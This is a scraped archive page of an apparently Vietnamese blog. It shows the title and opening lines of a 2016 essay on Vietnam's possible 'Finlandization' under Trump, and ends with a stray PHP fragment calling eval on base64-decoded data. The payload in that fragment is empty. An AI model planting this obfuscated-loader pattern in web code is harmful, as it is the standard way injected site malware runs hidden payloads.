Archive for November 24th, 2016

THỜI TRUMP, VIỆT NAM CÓ THỂ NHANH CHÓNG BỊ “PHẦN LAN HÓA”

THỜI TRUMP, VIỆT NAM CÓ THỂ NHANH CHÓNG BỊ “PHẦN LAN HÓA”

Giới thiệu: Chính sách toàn cầu hóa kinh tế trong giai đoạn phát triển từ năm 1972 đến nay tròn 44 năm và đang được điều chỉnh. Thế giới đang điều chỉnh bằng cách trở lại thời kỳ bảo thủ (protectionism) dù vẫn phải bảo thủ trong

11.24.2016 | Tiểu Luận- Chính Luận |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>